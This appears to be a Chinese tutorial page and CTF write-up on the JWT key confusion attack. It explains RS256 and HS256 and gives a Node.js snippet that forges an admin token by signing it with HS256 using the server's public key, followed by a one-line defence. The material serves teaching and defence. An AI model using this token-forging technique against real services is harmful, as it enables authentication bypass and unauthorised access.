跳转至

密钥混淆攻击

前言

JWT 签名算法中,一般有两个选择,一个采用 HS256, 另外一个就是采用 RS256。 签名实际上是一个加密的过程,生成一段标识(也是 JWT 的一部分)作为接收方验证信息是否被篡改的依据。

RS256 (采用 SHA-256 的 RSA 签名) 是一种非对称算法, 它使用公共 / 私钥对: 标识提供方采用私钥生成签名, JWT 的使用方获取公钥以验证签名。由于公钥 (与私钥相比) 不需要保护, 因此大多数标识提供方使其易于使用方获取和使用 (通常通过一个元数据 URL)。 另一方面, HS256 (带有 SHA-256 的 HMAC 是一种对称算法, 双方之间仅共享一个 密钥。由于使用相同的密钥生成签名和验证签名, 因此必须注意确保密钥不被泄密。

在开发应用的时候启用 JWT,使用 RS256 更加安全,你可以控制谁能使用什么类型的密钥。另外,如果你无法控制客户端,无法做到密钥的完全保密,RS256 会是个更佳的选择,JWT 的使用方只需要知道公钥。

由于公钥通常可以从元数据 URL 节点获得,因此可以对客户端进行进行编程以自动检索公钥。如果采用这种方式,从服务器上直接下载公钥信息,可以有效的减少配置信息。

利用

此攻击的原因是某些库对签名 / 验证 HMAC 对称加密的密钥和包含用于验证 RSA 签名令牌的公钥的密钥使用相同的变量名。 通过将算法调整为 HMAC 变体(HS256/HS384/HS512)并使用公共可用公钥对其进行签名,我们可以欺骗服务使用机密变量中的硬编码公钥验证 HMAC 令牌。

WP

由于 jwt 在 python 和 nodejs 的库不同,造成在这里只能自己手动生成了, 之后运行 nodejs 获取 cookie 去替换即可

router.get('/', function(req, res, next) {
  res.type('html');
  var cert = fs.readFileSync(process.cwd()+'//routes/public.key');
  var token = jwt.sign({ user: 'admin' }, cert, { algorithm: 'HS256' });

  res.cookie('auth',token);
  res.end('where is flag?');

});

如何防御

JWT 配置应该只允许使用 HMAC 算法或公钥算法,决不能同时使用这两种算法

评论